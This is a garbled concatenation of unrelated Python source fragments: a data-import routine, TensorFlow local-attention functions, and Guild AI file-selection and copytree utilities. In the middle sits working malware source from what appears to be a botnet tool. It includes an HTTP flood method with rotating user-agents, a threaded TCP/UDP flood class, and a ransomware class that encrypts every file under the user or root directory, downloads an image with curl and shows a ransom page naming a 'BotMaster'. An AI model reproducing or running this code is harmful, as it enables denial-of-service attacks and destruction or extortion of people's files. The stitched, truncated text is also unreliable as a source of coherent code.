if not with_original_date:
annotation.created = None
annotation.updated = None
annotation.save()
for user in [u for u in remote_users if "userannotation_creator" in u.roles]:
remote_annots_for_user = [a for a in remote_annots if a.user == user.id]
# SWITCH to annotation creator user
connect_as(User().fetch(self.id_mapping[user.id]))
Parallel(n_jobs=-1, backend="threading")(delayed(_add_annotation)
(remote_annotation, self.id_mapping, self.with_original_date)
for remote_annotation in remote_annots_for_user)
# SWITCH back to admin
connect_as(self.super_admin, True)
# --------------------------------------------------------------------------------------------------------------
logging.info("5/ Import metadata (properties, attached files, description)")
obj = Model()
obj.id = -1
obj.class_ = ""
properties_json = [f for f in os.listdir(self.working_path) if
f.endswith(".json") and f.startswith("properties")]
for property_json in properties_json:
for remote_prop in json.load(open(os.path.join(self.working_path, property_json))):
| |
output: a tensor of the same shape as x
"""
with tf.variable_scope(
name, default_name="right_shift_blockwise", values=[x]):
x_list_shape = x.get_shape().as_list()
x_shape = common_layers.shape_list(x)
# Add a dummy dimension for heads.
x = tf.expand_dims(x, axis=1)
x = pad_to_multiple_2d(x, query_shape)
padded_x_shape = common_layers.shape_list(x)
# Set up q blocks.
x_indices = gather_indices_2d(x, query_shape, query_shape)
x_new = get_shifted_center_blocks(x, x_indices)
# Put representations back into original shapes.
output = scatter_blocks_2d(x_new, x_indices, padded_x_shape)
# Remove the dummy head dimension.
output = tf.squeeze(output, axis=1)
# Remove the padding if introduced.
output = tf.slice(output, [0, 0, 0, 0], [-1, x_shape[1], x_shape[2], -1])
output.set_shape(x_list_shape)
return output
def masked_local_attention_2d(q,
k,
v,
query_shape=(8, 16),
memory_flange=(8, 16),
name=None):
"""Strided block local self-attention.
Each position in a query block can attend to all the generated queries in
the query block, which are generated in raster scan, and positions that are
generated to the left and top. The shapes are specified by query shape and
memory flange. Note that if you're using this function, you do not need to
right shift. Right shifting happens inside this function separately for each
block.
Args:
q: a Tensor with shape [batch, heads, h, w, depth_k]
k: a Tensor with shape [batch, heads, h, w, depth_k]
v: a Tensor with shape [batch, heads, h, w, depth_v]. In the current
implementation, depth_v must be equal to depth_k.
query_shape: a tuple indicating the height and width of each query block.
  query_shape = block_shape
memory_flange: a tuple indicating how much to look in height and width
  from each query block.
  memory shape = query_shape + (block_flange[0], 2*block_flange[1])
name: an optional string
Returns:
a Tensor of shape [batch, heads, h, w, depth_v]
"""
with tf.variable_scope(
name, default_name="local_masked_self_attention_2d", values=[q, k, v]):
v_shape = common_layers.shape_list(v)
# Pad query to ensure multiple of corresponding lengths.
q = pad_to_multiple_2d(q, query_shape)
# Set up query blocks.
q_indices = gather_indices_2d(q, query_shape, query_shape)
q_new = gather_blocks_2d(q, q_indices)
# Set up key and value blocks.
k_flange, k_center = get_memory_region(k, query_shape, memory_flange,
q_indices)
v_flange, v_center = get_memory_region(v, query_shape, memory_flange,
q_indices)
if k_flange is not None:
k_new = tf.concat([k_flange, k_center], axis=3)
v_new = tf.concat([v_flange, v_center], axis=3)
else:
k_new = k_center
v_new = v_center
# Set up the masks.
query_elements = np.prod(query_shape)
padding_mask = None
if k_flange is not None:
padding_mask = tf.expand_dims(
embedding_to_padding(k_flange) * -1e9, axis=-2)
padding_mask = tf.tile(padding_mask, [1, 1, 1, query_elements, 1])
center_attention_bias = attention_bias_lower_triangle(
np.prod(query_elements))
center_attention_bias = tf.reshape(
center_attention_bias, [1, 1, 1, query_elements, query_elements])
v_center_shape = common_layers.shape_list(v_center)
center_attention_bias = tf.tile(
center_attention_bias,
[v_center_shape[0], v_center_shape[1], v_center_shape[2], 1, 1])
if padding_mask is not None:
# Combine the mask for padding and visible region.
attention_bias = tf.concat([padding_mask, center_attention_bias], axis=4)
else:
attention_bias = center_attention_bias
output = dot_product_attention(
q_new,
k_new,
v_new,
attention_bias,
dropout_rate=0.,
name="masked_local_2d",
make_image_summary=False)
# Put representations back into original shapes.
padded_q_shape = common_layers.shape_list(q)
output = scatter_blocks_2d(output, q_indices, padded_q_shape)
# Remove the padding if introduced.
output = tf.slice(output, [0, 0, 0, 0, 0],
[-1, -1, v_shape[2], v_shape[3], -1])
return output
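# Hedged usage sketch (not part of the original module): the 5-D layout expected
# by masked_local_attention_2d above. The block sizes here are illustrative
# assumptions, not values taken from any particular model configuration.
def _example_masked_local_attention_2d(q, k, v):
  """q, k, v: Tensors of shape [batch, heads, h, w, depth]; depth_v == depth_k."""
  return masked_local_attention_2d(
      q, k, v, query_shape=(8, 16), memory_flange=(8, 16))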
def compute_attention_component(antecedent,
total_depth,
filter_width=1,
padding="VALID",
name="c",
vars_3d_num_heads=0):
"""Computes attention compoenent (query, key or value).
Args:
antecedent: a Tensor with shape [batch, length, channels]
total_depth: an integer
filter_width: An integer specifying how wide you want the attention
component to be.
padding: One of "VALID", "SAME" or "LEFT". Default is VALID: No padding.
name: a string specifying scope name.
vars_3d_num_heads: an optional integer (if we want to use 3d variables)
Returns:
c : [batch, length, depth] tensor
"""
if vars_3d_num_heads > 0:
assert filter_width == 1
input_depth = antecedent.get_shape().as_list()[-1]
depth_per_head = total_depth // vars_3d_num_heads
initializer_stddev = input_depth ** -0.5
if "q" in name:
initializer_stddev *= depth_per_head ** -0.5
var = tf.get_variable(
name, [input_depth,
vars_3d_num_heads,
total_depth // vars_3d_num_heads],
initializer=tf.random_normal_initializer(stddev=initializer_stddev))
var = tf.cast(var, antecedent.dtype)
var = tf.reshape(var, [input_depth, total_depth])
return tf.tensordot(antecedent, var, axes=1)
if filter_width == 1:
return common_layers.dense(
antecedent, total_depth, use_bias=False, name=name)
else:
return common_layers.conv1d(
antecedent, total_depth, filter_width, padding=padding, name=name)
def compute_qkv(query_antecedent,
memory_antecedent,
total_key_depth,
total_value_depth,
q_filter_width=1,
kv_filter_width=1,
q_padding="VALID",
kv_padding="VALID",
vars_3d_num_heads=0):
"""Computes query, key and value.
Args:
query_antecedent: a Tensor with shape [batch, length_q, channels]
memory_antecedent: a Tensor with shape [batch, length_m, channels]
total_key_depth: an integer
total_value_depth: an integer
q_filter_width: An integer specifying how wide you want the query to be.
kv_filter_width: An integer specifying how wide you want the keys and values
to be.
q_padding: One of "VALID", "SAME" or "LEFT". Default is VALID: No padding.
kv_padding: One of "VALID", "SAME" or "LEFT". Default is VALID: No padding.
vars_3d_num_heads: an optional integer (if we want to use 3d variables)
Returns:
q, k, v : [batch, length, depth] tensors
"""
if memory_antecedent is None:
memory_antecedent = query_antecedent
q = compute_attention_component(
query_antecedent,
total_key_depth,
q_filter_width,
q_padding,
"q",
vars_3d_num_heads=vars_3d_num_heads)
k = compute_attention_component(
memory_antecedent,
total_key_depth,
kv_filter_width,
kv_padding,
"k",
vars_3d_num_heads=vars_3d_num_heads)
v = compute_attention_component(
memory_antecedent,
total_value_depth,
kv_filter_width,
kv_padding,
"v",
vars_3d_num_heads=vars_3d_num_heads)
return q, k, v
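# Hedged usage sketch (not part of the original module): how compute_qkv is
# typically driven (multihead_attention below does essentially this). The
# depths used here are illustrative assumptions.
def _example_compute_qkv(query_antecedent, memory_antecedent=None):
  """query_antecedent: [batch, length_q, channels]; memory_antecedent or None."""
  # Passing memory_antecedent=None yields self-attention (keys/values share the query input).
  q, k, v = compute_qkv(
      query_antecedent, memory_antecedent,
      total_key_depth=512, total_value_depth=512)
  # q: [batch, length_q, 512]; k, v: [batch, length_m, 512]
  return q, k, v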
def multihead_attention(query_antecedent,
memory_antecedent,
bias,
total_key_depth,
total_value_depth,
output_depth,
num_heads,
dropout_rate,
shared_rel=False,
max_relative_position=None,
image_shapes=None,
attention_type="dot_product",
block_length=128,
block_width=128,
q_filter_width=1,
kv_filter_width=1,
q_padding="VALID",
kv_padding="VALID",
cache=None,
gap_size=0,
num_memory_blocks=2,
name="multihead_attention",
save_weights_to=None,
make_image_summary=True,
dropout_broadcast_dims=None,
max_length=None,
vars_3d=False,
**kwargs):
"""Multihead scaled-dot-product attention with input/output transformations.
Args:
query_antecedent: a Tensor with shape [batch, length_q, channels]
memory_antecedent: a Tensor with shape [batch, length_m, channels] or None
bias: bias Tensor (see attention_bias())
total_key_depth: an integer
total_value_depth: an integer
output_depth: an integer
num_heads: an integer dividing total_key_depth and total_value_depth
dropout_rate: a floating point number
shared_rel: boolean to share relative embeddings
max_relative_position: Maximum distance between inputs to generate
unique relation embeddings for. Only relevant
when using "dot_product_relative" attention.
image_shapes: optional tuple of integer scalars.
see comments for attention_image_summary()
attention_type: a string, either "dot_product", "dot_product_relative",
"local_mask_right", "local_unmasked", "masked_dilated_1d",
"unmasked_dilated_1d", graph, or any attention function
with the signature (query, key, value, **kwargs)
block_length: an integer - relevant for "local_mask_right"
block_width: an integer - relevant for "local_unmasked"
q_filter_width: An integer specifying how wide you want the query to be.
kv_filter_width: An integer specifying how wide you want the keys and values
to be.
q_padding: One of "VALID", "SAME" or "LEFT". Default is VALID: No padding.
kv_padding: One of "VALID", "SAME" or "LEFT". Default is "VALID":
no padding.
cache: dict containing Tensors which are the results of previous
attentions, used for fast decoding. Expects the dict to contain two
keys ('k' and 'v'), for the initial call the values for these keys
should be empty Tensors of the appropriate shape.
'k' [batch_size, 0, key_channels]
'v' [batch_size, 0, value_channels]
gap_size: Integer option for dilated attention to indicate spacing between
memory blocks.
num_memory_blocks: Integer option to indicate how many memory blocks to look
at.
name: an optional string.
save_weights_to: an optional dictionary to capture attention weights
for vizualization; the weights tensor will be appended there under
a string key created from the variable scope (including name).
make_image_summary: Whether to make an attention image summary.
dropout_broadcast_dims: an optional list of integers less than 4
specifying in which dimensions to broadcast the dropout decisions.
saves memory.
max_length: an integer - needed by relative attention
vars_3d: use 3-dimensional variables for input/output transformations
**kwargs (dict): Parameters for the attention function
Caching:
WARNING: For decoder self-attention, i.e. when memory_antecedent == None,
the caching assumes that the bias contains future masking.
The caching works by saving all the previous key and value values so that
you are able to send just the last query location to this attention
function. I.e. if the cache dict is provided it assumes the query is of the
shape [batch_size, 1, hidden_dim] rather than the full memory.
Returns:
The result of the attention transformation. The output shape is
[batch_size, length_q, hidden_dim]
unless the cache dict is provided in which case only the last memory
position is calculated and the output shape is [batch_size, 1, hidden_dim]
Optionally returns an additional loss parameters (ex: load balance loss for
the experts) returned by the attention_type function.
Raises:
ValueError: if the key depth or value depth are not divisible by the
number of attention heads.
"""
if total_key_depth % num_heads != 0:
raise ValueError("Key depth (%d) must be divisible by the number of | |
NT 5.0; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)',
'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)',
'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3; Linux)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)',
'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51']
return user_agents
def stop_atk(self):
self.stopatk = True
def build_querystr(self, value):
result = ''
for i in range(value):
item = random.randint(65, 100)
result += chr(item)
return result
def ddos(self):
code = 0
if not self.stopatk:
try:
agent = random.choice(self.useragents)
req = urllib.request.Request(self.ip, headers={'User-Agent': agent,
'Referer': random.choice(
self.referers) + self.build_querystr(
random.randint(50, 100)),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive': random.randint(110, 160),
'Connection': 'keep-alive'})
urllib.request.urlopen(req)
code = 200
except urllib.error.HTTPError as e:
code_split = str(e).split()
code = code_split[2]
code = str(code[0] + code[1] + code[2])
if "500" in str(e):
code = 500
elif "429" in str(e):
code = 500
elif code.startswith('5'):
code = 500
except urllib.error.URLError as e:
if "A connection attempt failed" in str(e):
code = 500
except:
pass
return code
def start_thr(self):
while True:
try:
x = threading.Thread(target=self.ddos)
x.start()
time.sleep(self.delay)
if self.stopatk:
break
except:
pass
def ddos_start(self):
while True:
try:
http_code = self.ddos()
if http_code == 500:
break
if self.stopatk:
break
except:
pass
class TCP_UDP_Flood:
def __init__(self, ip, port, delay, pkt_size, thr_count):
self.ip = ip
self.port = int(port)
self.delay = float(delay)
self.pkt_size = int(pkt_size)
self.thread_count = thr_count
self.havingskillissues = False
self.stop = False
def gen_packet(self, size):
return random._urandom(size)
def UDP_Req(self):
while not self.stop:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port))
s.close()
if self.havingskillissues:
self.havingskillissues = False
time.sleep(self.delay)
except KeyboardInterrupt:
self.stop = True
except Exception as e:
if "too big" in str(e).lower():
self.pkt_size -= 1
if not self.havingskillissues:
self.havingskillissues = True
def TCP_req(self):
while not self.stop:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, self.port))
s.send(self.gen_packet(self.pkt_size))
s.close()
if self.havingskillissues:
self.havingskillissues = False
time.sleep(self.delay)
except KeyboardInterrupt:
self.stop = True
except Exception as e:
if "too big" in str(e).lower():
self.pkt_size -= 1
if not self.havingskillissues:
self.havingskillissues = True
def Stop_Atk(self):
self.stop = True
def TCP_Flood(self):
for i in range(self.thread_count):
try:
tcp_req = threading.Thread(target=self.TCP_req)
tcp_req.start()
except KeyboardInterrupt:
self.stop = True
except:
pass
def UDP_Flood(self):
for i in range(self.thread_count):
try:
udp_req = threading.Thread(target=self.UDP_Req)
udp_req.start()
except KeyboardInterrupt:
self.stop = True
except:
pass
class RansomWare:
def __init__(self, key):
self.key = key
self.fernet = Fernet(self.key)
self.dirlist = []
self.filelist = []
self.keyfile = "key.txt"
self.recovery_directory = ""
if sys.platform == "win32":
os.chdir("C:/Users/")
self.recovery_directory = f"C:/Users/{os.getlogin()}/"
else:
self.recovery_directory = "/"
os.chdir("/")
def get_dir_list(self):
for i in os.listdir():
try:
file = open(i, "rb")
file.close()
self.filelist.append(os.path.join(os.getcwd(),i))
except:
self.dirlist.append(os.path.join(os.getcwd(), i))
def encrypt_file(self, file):
try:
with open(file, "rb") as og_file:
content = self.fernet.encrypt(og_file.read())
og_file.close()
with open(file, "wb") as enc_file:
enc_file.write(content)
enc_file.close()
except:
pass
def encrypt(self):
self.get_dir_list()
for i in self.dirlist:
try:
os.chdir(i)
self.get_dir_list()
except:
pass
for i in self.filelist:
file_thread = threading.Thread(target=self.encrypt_file, args=(i,))
file_thread.start()
self.ransom()
self.checker = threading.Thread(target=self.check_key_file)
self.checker.start()
def decrypt(self):
for i in self.filelist:
try:
with open(i,"rb") as enc_file:
content = self.fernet.decrypt(enc_file.read())
enc_file.close()
with open(i,"wb") as new_file:
new_file.write(content)
new_file.close()
except:
pass
def download_emotional_support(self):
cmd = subprocess.Popen(f"cd {self.recovery_directory}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
_cmd = subprocess.Popen(f"curl -o barbara.png https://i.redd.it/w2eduogz9ir51.png", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
def recovering_html_code(self):
return '''
<!DOCTYPE html>
<head>
<style>
#roundedCorners {
border-radius: 25px;
border-spacing: 0;
}
#roundedCorners td,
#roundedCorners th {
border-bottom: 1px solid rgb(0, 0, 0);
padding: 10px;
}
#roundedCorners tr:last-child > td {
border-bottom: none;
}
</style>'''+f'''
</head>
<title>Yay! | You've entered the correct encryption key!</title>
<body bgcolor='skyblue'>
<div style="font-family: sans-serif; text-align: center;">
<h1 style="text-align: center;">You entered the correct encryption key!</h1>
<table style="margin-left: auto; margin-right: auto; background-color: rgb(96, 99, 255);" id="roundedCorners">
<tr>
<td><h1>Lucky you!</h1></td>
</tr>
<tr>
<td>
<h3>Soon you will have your files back!</h3>
</td>
</tr>
<tr>
<td>
<h2>You have successfully put the correct encryption key into the text file({self.keyfile}).</h2>
<h2>Please wait a moment, as the decrypted files are being decrypted at this moment.
<h4>You can say your goodbyes to Barbara!</h4>
</td>
</tr>
<tr>
<td>
<img src="barbara.png" alt="Where is the image?" width="300" height="500" style="margin-left: auto; margin-right: auto;">
</td>
</tr>
</table>
</div>
</body>
'''
def ransom_html_code(self):
return '''
<!DOCTYPE html>
<head>
<style>
#roundedCorners {
border-radius: 25px;
border-spacing: 0;
}
#roundedCorners td,
#roundedCorners th {
border-bottom: 1px solid rgb(0, 0, 0);
padding: 10px;
}
#roundedCorners tr:last-child > td {
border-bottom: none;
}
</style>'''+f'''
</head>
<body bgcolor='red'>
<div style="font-family: sans-serif; text-align: center;">
<title>Oops! | You've been Compromised!</title>
<h1 style="text-align: center;">You have been compromised!</h1>
<table style="margin-left: auto; margin-right: auto; background-color: rgb(255, 80, 67);" id="roundedCorners">
<tr>
<td><h1>Oops!</h1></td>
</tr>
<tr>
<td>
<h2>Looks like your files have been encrypted.</h2>
<h3>There is hope.</h3>
</td>
</tr>
<tr>
<td>
A file has been created in this directory: {self.recovery_directory}{self.keyfile}<br>
Simply place the encryption key of your files in the file(and this file only), and you will have your files back!<br>
How you will get your key? Well, that's all up to the BotMaster.
<h2>Heres a picture of Barbara! Perhaps she will give you emotional Support....</h2><br>
</td>
</tr>
<tr>
<td>
<img src="barbara.png" alt="Where is the image?" width="300" height="500" style="margin-left: auto; margin-right: auto;">
</td>
</tr>
</table>
</div>
</body>
'''
def check_key_file(self):
while True:
try:
file = open(f"{self.recovery_directory}{self.keyfile}","rb")
content = file.read()
if | |
# Copyright 2017-2022 RStudio, PBC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import fnmatch
import glob
import hashlib
import logging
import os
import re
import shutil
import six
from guild import util
log = logging.getLogger("guild")
class FileSelect:
def __init__(self, root, rules):
self.root = root
self.rules = rules
self._disabled = None
@property
def disabled(self):
if self._disabled is None:
self._disabled = self._init_disabled()
return self._disabled
def _init_disabled(self):
"""Returns True if file select is disabled.
Assumes not disabled until it finds a disable-all pattern (an untyped
match of '*'). The disabled state can be reset by any include
pattern.
"""
disabled = False
for rule in self.rules:
if rule.result:
disabled = False
elif "*" in rule.patterns and rule.type is None:
disabled = True
return disabled
def select_file(self, src_root, relpath):
"""Apply rules to file located under src_root with relpath.
All rules are applied to the file. The last rule to apply
(i.e. its `test` method returns a non-None value) determines
whether or not the file is selected - selected if test returns
True, not selected if returns False.
If no rules return a non-None value, the file is not selected.
Returns a tuple of the selected flag (True or False) and list
of applied rules and their results (two-tuples).
"""
rule_results = [
(rule.test(src_root, relpath), rule)
for rule in self.rules
if rule.type != "dir"
]
result, _test = reduce_file_select_results(rule_results)
return result is True, rule_results
def prune_dirs(self, src_root, relroot, dirs):
pruned = []
for name in sorted(dirs):
last_rule_result = None
relpath = os.path.join(relroot, name)
for rule in self.rules:
if rule.type != "dir":
continue
rule_result, _test = rule.test(src_root, relpath)
if rule_result is not None:
last_rule_result = rule_result
if last_rule_result is False:
log.debug("skipping directory %s", relpath)
pruned.append(name)
dirs.remove(name)
return pruned
def reduce_file_select_results(results):
"""Reduces a list of file select results to a single determining result."""
for (result, test), _rule in reversed(results):
if result is not None:
return result, test
return None, None
class FileSelectRule:
def __init__(
self,
result,
patterns,
type=None,
regex=False,
sentinel=None,
size_gt=None,
size_lt=None,
max_matches=None,
):
self.result = result
if isinstance(patterns, six.string_types):
patterns = [patterns]
if not regex:
patterns = _native_paths(patterns)
self.patterns = patterns
self.regex = regex
self._patterns_match = self._patterns_match_f(patterns, regex)
self.type = self._validate_type(type)
self.sentinel = sentinel
self.size_gt = size_gt
self.size_lt = size_lt
self.max_matches = max_matches
self._matches = 0
def _patterns_match_f(self, patterns, regex):
if regex:
return self._regex_match_f(patterns)
else:
return self._fnmatch_f(patterns)
@staticmethod
def _regex_match_f(patterns):
compiled = [re.compile(p) for p in patterns]
return lambda path: any((p.match(util.norm_path_sep(path)) for p in compiled))
@staticmethod
def _fnmatch_f(patterns):
return lambda path: any((_fnmatch(path, p) for p in patterns))
@staticmethod
def _validate_type(type):
valid = ("text", "binary", "dir")
if type is not None and type not in valid:
raise ValueError(
"invalid value for type %r: expected one of %s"
% (type, ", ".join(valid))
)
return type
@property
def matches(self):
return self._matches
def reset_matches(self):
self._matches = 0
def test(self, src_root, relpath):
fullpath = os.path.join(src_root, relpath)
tests = [
FileSelectTest("max matches", self._test_max_matches),
FileSelectTest("pattern", self._test_patterns, relpath),
FileSelectTest("type", self._test_type, fullpath),
FileSelectTest("size", self._test_size, fullpath),
]
for test in tests:
if not test():
return None, test
self._matches += 1
return self.result, None
def _test_max_matches(self):
if self.max_matches is None:
return True
return self._matches < self.max_matches
def _test_patterns(self, path):
return self._patterns_match(path)
def _test_type(self, path):
if self.type is None:
return True
if self.type == "text":
return self._test_text_file(path)
elif self.type == "binary":
return self._test_binary_file(path)
elif self.type == "dir":
return self._test_dir(path)
else:
assert False, self.type
@staticmethod
def _test_text_file(path):
return util.safe_is_text_file(path)
@staticmethod
def _test_binary_file(path):
return not util.safe_is_text_file(path)
def _test_dir(self, path):
if not os.path.isdir(path):
return False
if self.sentinel:
return glob.glob(os.path.join(path, self.sentinel))
return True
def _test_size(self, path):
if self.size_gt is None and self.size_lt is None:
return True
size = util.safe_filesize(path)
if size is None:
return True
if self.size_gt and size > self.size_gt:
return True
if self.size_lt and size < self.size_lt:
return True
return False
def _native_paths(patterns):
return [p.replace("/", os.path.sep) for p in patterns]
def _fnmatch(path, pattern):
if os.path.sep not in pattern:
path = os.path.basename(path)
pattern = _strip_leading_path_sep(pattern)
return fnmatch.fnmatch(path, pattern)
def _strip_leading_path_sep(pattern):
while pattern:
if pattern[0] != os.path.sep:
break
pattern = pattern[1:]
return pattern
class FileSelectTest:
def __init__(self, name, test_f, *test_args):
self.name = name
self.test_f = test_f
self.test_args = test_args
def __call__(self):
return self.test_f(*self.test_args)
def include(patterns, **kw):
return FileSelectRule(True, patterns, **kw)
def exclude(patterns, **kw):
return FileSelectRule(False, patterns, **kw)
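# Hedged usage sketch (not part of the original module): building a FileSelect
# from include/exclude rules. The patterns below are illustrative assumptions.
def _example_file_select():
    return FileSelect(
        root="",
        rules=[
            include("*.py"),               # select Python sources
            exclude("*_test.py"),          # ...but drop test modules
            exclude("build", type="dir"),  # prune build directories entirely
        ],
    )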
class FileCopyHandler:
def __init__(self, src_root, dest_root, select):
self.src_root = src_root
self.dest_root = dest_root
self.select = select
def copy(self, path, _rule_results):
src = os.path.join(self.src_root, path)
dest = os.path.join(self.dest_root, path)
log.debug("copying %s to %s", src, dest)
util.ensure_dir(os.path.dirname(dest))
self._try_copy_file(src, dest)
def _try_copy_file(self, src, dest):
try:
shutil.copyfile(src, dest)
shutil.copymode(src, dest)
except IOError as e:
if e.errno != 2: # Ignore file not exists
if not self.handle_copy_error(e, src, dest):
raise
except OSError as e: # pylint: disable=duplicate-except
if not self.handle_copy_error(e, src, dest):
raise
def ignore(self, _path, _rule_results):
pass
@staticmethod
def handle_copy_error(_e, _src, _dest):
return False
def copytree(dest, select, root_start=None, followlinks=True, handler_cls=None):
"""Copies files to dest for a FileSelect.
root_start is an optional location from which select.root, if
relative, starts. Defaults to os.curdir.
If followlinks is True (the default), follows linked directories
when copying the tree.
A handler class may be specified to create a handler of copy
events. FileCopyHandler is used by default. If specified, the
class is used to instantiate a handler with `(src, dest,
select)`. Handler methods `copy()` and `ignore()` are called with
`(relpath, results)` where `results` is a list of results from
each rule as `(result, rule)` tuples.
As an optimization, `copytree` skips evaluation of files if the
file select is disabled. File selects are disabled if no files can
be selected for their rules. If select is disabled and a handler
class is specified, the handler is still instantiated, however, no
calls to `copy()` or `ignore()` will be made.
"""
src = _copytree_src(root_start, select)
# Instantiate handler as part of the copytree contract.
handler = (handler_cls or FileCopyHandler)(src, dest, select)
if select.disabled:
return
for root, dirs, files in os.walk(src, followlinks=followlinks):
dirs.sort()
relroot = _relpath(root, src)
pruned = select.prune_dirs(src, relroot, dirs)
for name in pruned:
relpath = os.path.join(relroot, name)
handler.ignore(relpath, [])
for name in sorted(files):
relpath = os.path.join(relroot, name)
selected, results = select.select_file(src, relpath)
if selected:
handler.copy(relpath, results)
else:
handler.ignore(relpath, results)
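# Hedged usage sketch (not part of the original module): copying a tree with a
# FileSelect like the one above. Paths and patterns are illustrative assumptions.
def _example_copytree(src_dir, dest_dir):
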